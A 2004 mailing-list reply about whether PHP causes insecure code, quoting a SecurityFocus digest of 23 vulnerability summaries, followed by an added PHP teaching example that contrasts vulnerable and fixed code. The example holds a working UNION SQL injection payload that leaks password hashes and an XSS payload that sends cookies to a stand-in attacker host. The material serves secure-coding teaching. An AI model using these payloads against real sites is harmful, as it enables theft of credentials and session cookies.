Subject: Re: exploits
From: "Antti Kurenniemi"
I wouldn't blame those on PHP (though it certainly makes it very easy to
write unsafe code), but more on lazy / incompetent developers / testers. I
think it doesn't really depend on what language you use: if you do database
stuff that has any user input, you simply must validate all input before
proceeding, in each and every step.
Antti Kurenniemi
(I'm currently re-teaching PHP to a student who learnt it in school
really, really badly - he makes all of these mistakes)
"Geo." wrote in message
news:405f4e5a$1{at}w3.nls.net...
> Thought you might find this interesting as people are always asking me why
> I don't use php. Here's the list for this securityfocus newsletter I received
> today:
>
> (I don't know why they make it sound like these are MS issues, it's just
> the MS platform)
>
> II. MICROSOFT VULNERABILITY SUMMARY
> -----------------------------------
> 1. Dogpatch Software CFWebstore SQL Injection Vulnerability
> BugTraq ID: 9854
> Remote: Yes
> Date Published: Mar 12 2004
> Relevant URL: http://www.securityfocus.com/bid/9854
> Summary:
> It has been reported that CFWebstore is prone to a remote SQL injection
> vulnerability. This issue is due to a failure of the application to
> properly sanitize user input before including it in an SQL statement.
> As a result of this a malicious user may influence database queries in
> order to view or modify sensitive information, potentially compromising
> the software or the database. It has been reported that an attacker may be
> able to disclose the administrator password hash by exploiting this issue.
>
> 2. Dogpatch Software CFWebstore Cross-Site Scripting Vulnerabil...
> BugTraq ID: 9856
> Remote: Yes
> Date Published: Mar 12 2004
> Relevant URL: http://www.securityfocus.com/bid/9856
> Summary:
> It has been reported that CFWebstore is prone to a remote cross-site
> scripting vulnerability. This issue is due to a failure of the
> application to properly sanitize user input.
> Attackers may exploit this vulnerability to steal authentication
> credentials. Other attacks may also be possible.
>
> 3. Emumail EMU Webmail Multiple Vulnerabilities
> BugTraq ID: 9861
> Remote: Yes
> Date Published: Mar 12 2004
> Relevant URL: http://www.securityfocus.com/bid/9861
> Summary:
> Multiple vulnerabilities have been identified in the application that may
> allow an attacker to carry out cross-site scripting attacks and disclose
> the path to the victim's home directory. The issues are reported to exist
> in the login script, 'emumail.fcgi' script and the 'init.emu' sample
> script.
> EMU Webmail 5.2.7 has been reported to be affected by these issues.
>
> 4. PHPBB ViewTopic.PHP "postdays" Cross-Site Scripting Vulnerab...
> BugTraq ID: 9865
> Remote: Yes
> Date Published: Mar 13 2004
> Relevant URL: http://www.securityfocus.com/bid/9865
> Summary:
> It has been reported that one of the scripts included with phpBB is prone
> to a cross-site scripting vulnerability. According to the author of the
> report, the script "viewtopic.php" returns the value of the HTML variable
> "postdays" to the client as its output without encoding it or otherwise
> removing potentially hostile content. This can be exploited by
> constructing malicious links with the malicious "postdays" variable value
> embedded as a GET request style HTML variable. If the target user visits
> such a link, the malicious, externally created content supplied in the
> link will be rendered (or executed, in the case of script code) as part of
> the viewtopic.php document and within the context of the vulnerable
> website (including the phpBB forum).
>
> 5. PHPBB ViewForum.PHP "topicdays" Cross-Site Scripting Vulnera...
> BugTraq ID: 9866
> Remote: Yes
> Date Published: Mar 13 2004
> Relevant URL: http://www.securityfocus.com/bid/9866
> Summary:
> It has been reported that one of the scripts included with phpBB is prone
> to a cross-site scripting vulnerability. According to the author of the
> report, the script "viewforum.php" returns the value of the HTML variable
> "topicdays" to the client as its output without encoding it or otherwise
> removing potentially hostile content. This can be exploited by
> constructing malicious links with the malicious "topicdays" variable value
> embedded as a GET request style HTML variable. If the target user visits
> such a link, the malicious, externally created content supplied in the
> link will be rendered (or executed, in the case of script code) as part of
> the viewtopic.php document and within the context of the vulnerable
> website (including the phpBB forum).
>
> 6. Check Point Firewall-1 SmartDashboard Filter Buffer Overflow...
> BugTraq ID: 9870
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9870
> Summary:
> It has been reported that Check Point Firewall-1 SmartDashboard may be
> prone to a buffer overflow vulnerability that may allow an attacker to
> execute arbitrary code on a vulnerable system in order to gain
> unauthorized access. The issue is reported to present itself when the
> SmartTracker utility is used to add a firewall filter for Firewall-1. An
> attacker may be able to cause a buffer overflow condition by supplying an
> excessive amount of data via the filter line.
> It is likely that access to SmartDashboard requires administrator
> credentials, in which case this issue would not be considered a
> vulnerability. This has not been confirmed at the moment. Due to a lack
> of information further details cannot be outlined at the moment. This BID
> will be updated as more information becomes available.
> This vulnerability is reported to affect SmartDashboard supplied with
> Check Point Software NG-AI R54 and NG-AI R55, however, other versions
> could be affected as well.
>
> 7. WS_FTP Pro Client Remote Buffer Overflow Vulnerability
> BugTraq ID: 9872
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9872
> Summary:
> It has been reported that WS_FTP Pro client may be prone to a remote
> buffer overflow vulnerability that may allow an attacker to execute
> arbitrary code on a vulnerable system. An attacker may be able to cause a
> buffer overflow condition in the client by supplying a file or a directory
> with a large name exceeding 260 bytes without a terminating CR/LF
> character to the server. The buffer overflow condition would occur when
> the client attempts to browse through the attacker-supplied directory.
> This issue is reported to affect WS_FTP Pro 8.02 and 8.03, however, other
> versions may be affected as well.
>
> 8. YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites
> BugTraq ID: 9873
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9873
> Summary:
> It has been reported that YaBB and YaBB SE are prone to multiple
> cross-site scripting vulnerabilities. These issues are due to a failure
> of the applications to properly validate URI supplied user input.
> Attackers may exploit this vulnerability to steal authentication
> credentials. Other attacks may also be possible.
>
> 9. Multiple Vendor SOAP Server Undisclosed Request Denial Of Se...
> BugTraq ID: 9877
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9877
> Summary:
> A problem has been identified in several different SOAP servers when
> handling certain types of requests. Because of this, it is possible for an
> attacker to force a denial of service on systems using a vulnerable
> implementation.
> This BID will be updated as further details regarding this vulnerability
> are made public.
>
> 10. PHP-Nuke Modules.php Multiple Cross-Site Scripting Vulnerabi...
> BugTraq ID: 9879
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9879
> Summary:
> It has been reported that PHP-Nuke may be prone to multiple cross-site
> scripting vulnerabilities. These vulnerabilities occur due to
> insufficient sanitization of user-supplied data via the 'Your Name',
> 'nicname', 'fname', 'ratenum', and 'search' fields of 'modules.php'
> script. Exploitation could allow for theft of cookie-based authentication
> credentials. Other attacks are also possible.
> PHP-Nuke 7.1.0 has been reported to be prone to these issues, however, it
> is possible that other versions are affected as well. These issues are
> undergoing further analysis. These issues will be separated into
> individual BIDs once analysis is complete.
>
> 11. PHPBB Search.PHP Search_Results Parameter SQL Injection Vuln...
> BugTraq ID: 9883
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9883
> Summary:
> A vulnerability has been reported to exist in the software that may allow
> a remote user to inject malicious SQL syntax into database queries. The
> problem reportedly exists in one of the parameters of the search.php
> script. This issue is caused by insufficient sanitization of user-supplied
> data. A remote attacker may exploit this issue to influence SQL query
> logic to disclose sensitive information that could be used to gain
> unauthorized access.
>
> 12. SteelID thePhotoTool Login.ASP SQL Injection Vulnerability
> BugTraq ID: 9884
> Remote: Yes
> Date Published: Mar 15 2004
> Relevant URL: http://www.securityfocus.com/bid/9884
> Summary:
> SteelID thePhotoTool is prone to an SQL injection vulnerability. The issue
> is reported to exist in the 'login.asp' script, which does not
> sufficiently sanitize user-supplied input before including it in SQL
> queries. This could permit remote attackers to pass malicious input to
> database queries, resulting in modification of query logic or other
> attacks.
>
> 13. WS_FTP Pro Client Remote Stack Buffer Overflow Vulnerability
> BugTraq ID: 9886
> Remote: Yes
> Date Published: Mar 16 2004
> Relevant URL: http://www.securityfocus.com/bid/9886
> Summary:
> It has been reported that WS_FTP Pro client may be prone to a remote
> buffer overflow vulnerability that may allow an attacker to execute
> arbitrary code on a vulnerable system in order to gain unauthorized
> access. The issue is reported to present itself when the client views
> directory listings containing files and directory names of excessive
> length without a terminating CR/LF character. This vulnerability exists
> in WS_FTP Pro version 8.0.3, which was released to fix the WS_FTP Pro
> Client Remote Buffer Overflow Vulnerability described in BID 9872. It has
> been reported that the fixed version limits user-supplied data to 0x0200
> bytes; however, the buffer is allocated to 0x0100 bytes.
> Although this issue is reported to affect WS_FTP Pro 8.0.3, it is quite
> likely that it affects previous versions as well.
>
> 14. Mambo Open Source Index.PHP Cross-Site Scripting Vulnerabili...
> BugTraq ID: 9890
> Remote: Yes
> Date Published: Mar 16 2004
> Relevant URL: http://www.securityfocus.com/bid/9890
> Summary:
> It has been reported that the Mambo 'index.php' script is prone to a
> cross-site scripting vulnerability. This issue is due to a failure of the
> application to properly validate user supplied URI input. This issue
> could permit a remote attacker to create a malicious link to the
> vulnerable application that includes hostile HTML and script code. If this
> link were followed, the hostile code may be rendered in the web browser of
> the victim user.
>
> 15. Mambo Open Source Index.PHP SQL Injection Vulnerability
> BugTraq ID: 9891
> Remote: Yes
> Date Published: Mar 16 2004
> Relevant URL: http://www.securityfocus.com/bid/9891
> Summary:
> It has been reported that the Mambo 'index.php' script is prone to an SQL
> injection vulnerability. This issue is due to a failure of the
> application to properly validate user supplied URI input.
> As a result of this a malicious user may influence database queries in
> order to view or modify sensitive information, potentially compromising
> the software or the database. It may be possible for an attacker to
> disclose the administrator password hash by exploiting this issue.
>
> 16. Microsoft Windows XP explorer.exe Remote Denial of Service V...
> BugTraq ID: 9892
> Remote: Yes
> Date Published: Mar 16 2004
> Relevant URL: http://www.securityfocus.com/bid/9892
> Summary:
> It has been reported that Windows Explorer for Windows XP may be prone to
> a denial of service vulnerability that may allow a remote attacker to
> cause the system to hang by sending a malicious directory containing 'wmf'
> files to a vulnerable user via e-mail or other means. Windows Explorer
> automatically attempts to parse 'wmf' files in the directory, however, an
> exceptional condition occurs if the directory contains records of zero
> length.
> Although unconfirmed, all versions of Windows XP are considered to be
> affected by this vulnerability.
>
> 17. PhpBB admin_words.php Multiple Vulnerabilities
> BugTraq ID: 9896
> Remote: Yes
> Date Published: Mar 16 2004
> Relevant URL: http://www.securityfocus.com/bid/9896
> Summary:
> It has been reported that PhpBB may be prone to multiple vulnerabilities
> that may allow an attacker to carry out SQL injection and cross-site
> scripting attacks. These issues are reported to affect the 'id' parameter
> of 'admin_words.php' module. The SQL injection attack requires
> administrator level access.
> PhpBB version 2.0.6c has been reported to be affected by these issues,
> however, it is possible that other versions are affected as well.
>
> 18. Techland Chrome Denial of Service Vulnerability
> BugTraq ID: 9898
> Remote: Yes
> Date Published: Mar 16 2004
> Relevant URL: http://www.securityfocus.com/bid/9898
> Summary:
> Reportedly Chrome is prone to a remote denial of service vulnerability.
> This issue is due to a failure to validate input of data received via
> network communications.
> This issue may allow a remote attacker to cause the affected server to
> crash, denying service to legitimate users. It has been conjectured that
> this issue may be leveraged to execute arbitrary code on the affected
> system in the context of the vulnerable process, however this is
> unconfirmed.
>
> 19. IBM Lotus Domino HTTP webadmin.nsf Directory Traversal Vulne...
> BugTraq ID: 9900
> Remote: Yes
> Date Published: Mar 17 2004
> Relevant URL: http://www.securityfocus.com/bid/9900
> Summary:
> It has been reported that Lotus Domino may be prone to a directory
> traversal vulnerability that may allow a remote attacker to access
> information outside the server root directory. The issue reportedly
> exists in the server's administrative interface accessed via
> 'webadmin.nsf'. The vulnerability may be exploited by a remote attacker
> by traversing outside the server root directory by using '../' directory
> traversal character sequences. Successful exploitation of this
> vulnerability may allow a remote attacker to gain access to sensitive
> information and/or modify the underlying file system.
> IBM Lotus Domino server 6.5.1 has been reported to be prone to this issue,
> however, it is possible that other versions are affected as well.
>
> 20. IBM Lotus Domino HTTP webadmin.nsf Quick Console Cross-Site...
> BugTraq ID: 9901
> Remote: Yes
> Date Published: Mar 17 2004
> Relevant URL: http://www.securityfocus.com/bid/9901
> Summary:
> It has been reported that Lotus Domino server may be prone to a cross-site
> scripting vulnerability that may allow a remote attacker to execute HTML
> or script code in a user's browser. The issue presents itself due to
> insufficient sanitization of user-supplied data via the 'Quick Console'
> function of 'webadmin.nsf' administrative interface.
> IBM Lotus Domino server 6.5.1 has been reported to be prone to this issue,
> however, it is possible that other versions are affected as well.
>
> 21. GlobalSCAPE Secure FTP Server SITE Command Remote Buffer Ove...
> BugTraq ID: 9904
> Remote: Yes
> Date Published: Mar 17 2004
> Relevant URL: http://www.securityfocus.com/bid/9904
> Summary:
> It has been reported that Secure FTP Server may be prone to a remote
> buffer overflow vulnerability that may allow attackers to execute
> arbitrary code on a vulnerable system in order to gain unauthorized
> access. An attacker may cause the buffer overflow condition to occur by
> sending about 252 bytes of data via a parameter of the SITE Command.
> Immediate consequences of an attack may result in a denial of service
> condition. The possibility of remote code execution has not been
> confirmed at the moment.
> Secure FTP Server version 2.0 Build 03.11.2004.2 has been reported to be
> prone to this issue.
>
> 22. DameWare Mini Remote Control Server Weak Encryption Implemen...
> BugTraq ID: 9909
> Remote: Yes
> Date Published: Mar 17 2004
> Relevant URL: http://www.securityfocus.com/bid/9909
> Summary:
> DameWare Mini Remote Control Server has been reported to be prone to a
> weak encryption implementation.
> It has been reported that analysis of encrypted traffic will reveal the
> block cipher that is used by DameWare Mini Remote Control to encrypt the
> plaintext data using ECB (Electronic Code Book) mode. This may ultimately
> allow an attacker to determine the block cipher and thereby expose
> plaintext credentials by reversing the process.
>
> 23. Belchior Foundry VCard Authentication Bypass Vulnerability
> BugTraq ID: 9910
> Remote: Yes
> Date Published: Mar 17 2004
> Relevant URL: http://www.securityfocus.com/bid/9910
> Summary:
> It has been reported that vCard is prone to a remote authentication bypass
> vulnerability. This issue is due to a design error that would allow a
> malicious user access to certain admin functionality without having to
> first authenticate to the application.
> This issue may be leveraged to manipulate the application database,
> potentially destroying data.
>
>
--- BBBS/NT v4.01 Flag-5
* Origin: Barktopia BBS Site http://HarborWebs.com:8081 (1:379/45)
SOURCE: echomail via fidonet.ozzmosis.com
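Added example, not part of the thread above and not code from any of the products in the quoted SecurityFocus list. It puts the two bug classes that dominate that list (SQL injection that "discloses the administrator password hash", and a GET parameter reflected into HTML unencoded, as in the phpBB "postdays"/"topicdays" entries) next to the fix Antti describes: validate every input at every step, and never let it become query or page syntax. The table, column and function names, the payloads and the two accounts are all constructed for illustration; it assumes PHP with the pdo_sqlite extension and uses an in-memory database so it runs offline.

```php
<?php
// Added example (not from the thread, not from any listed product).
// Assumes: PHP 7.4+ with pdo_sqlite. All names and data below are invented.
declare(strict_types=1);

function makeDb(): PDO {
    // Constructed schema: two accounts with real password hashes, so that
    // the injection below really does leak a hash and not a placeholder.
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, pass_hash TEXT NOT NULL)');
    $ins = $db->prepare('INSERT INTO users (name, pass_hash) VALUES (?, ?)');
    $ins->execute(['admin', password_hash('constructed-admin-secret', PASSWORD_DEFAULT)]);
    $ins->execute(['guest', password_hash('constructed-guest-secret', PASSWORD_DEFAULT)]);
    return $db;
}

// VULNERABLE: the pattern behind the SQL injection entries (BID 9854, 9883,
// 9891). The parameter is pasted into the SQL text, so a quote inside it
// ends the string literal and the rest is executed as SQL.
function findUserUnsafe(PDO $db, string $name): array {
    $sql = "SELECT id, name FROM users WHERE name = '$name'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// FIXED: prepared statement. The value travels separately from the query
// text, so it can only ever be compared against, never parsed.
function findUserSafe(PDO $db, string $name): array {
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = ?');
    $stmt->execute([$name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// VULNERABLE: reflected XSS of the "postdays"/"topicdays" kind, a GET
// parameter echoed straight back into the page.
function renderUnsafe(string $postdays): string {
    return "<p>Showing topics from the last $postdays days</p>";
}

// FIXED: validate against what the parameter is supposed to be (a small
// non-negative integer), then still encode on output. Validation rejects
// junk early; encoding guarantees that whatever does reach the HTML cannot
// turn into markup, even if a later code change weakens the validation.
function renderSafe(string $postdays): string {
    if (preg_match('/^\d{1,4}$/', $postdays) !== 1) {
        $postdays = '0';   // anything that is not 0-9999 falls back to 0
    }
    return '<p>Showing topics from the last '
        . htmlspecialchars($postdays, ENT_QUOTES, 'UTF-8')
        . ' days</p>';
}

// Constructed attacker input. The UNION pulls the pass_hash column into the
// result set that the page expects to hold names; "--" comments out the
// trailing quote the application appends.
$sqlPayload = "x' UNION SELECT id, pass_hash FROM users --";
// Constructed XSS payload; attacker.invalid is a reserved, non-routable name.
$xssPayload = '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>';

$db = makeDb();

echo "Unsafe query result:\n";
foreach (findUserUnsafe($db, $sqlPayload) as $row) {
    echo "  id={$row['id']} name={$row['name']}\n";
}
echo "Safe query result: " . count(findUserSafe($db, $sqlPayload)) . " row(s)\n";

echo "Unsafe render:\n  " . renderUnsafe($xssPayload) . "\n";
echo "Safe render:\n  " . renderSafe($xssPayload) . "\n";
echo "Safe render, valid input:\n  " . renderSafe('7') . "\n";
```

Run it with `php example.php`. The unsafe query returns every account's password hash in the `name` column, which is exactly the outcome the CFWebstore and Mambo entries describe; the prepared statement returns no rows for the same input because the payload is compared as a plain string. The unsafe render emits the script tag verbatim, while the safe render falls back to `0` on the validation step and would neutralise the angle brackets on the encoding step even if the validation were removed. The language makes no difference to any of this: the ColdFusion and ASP entries in the same list are the same two mistakes.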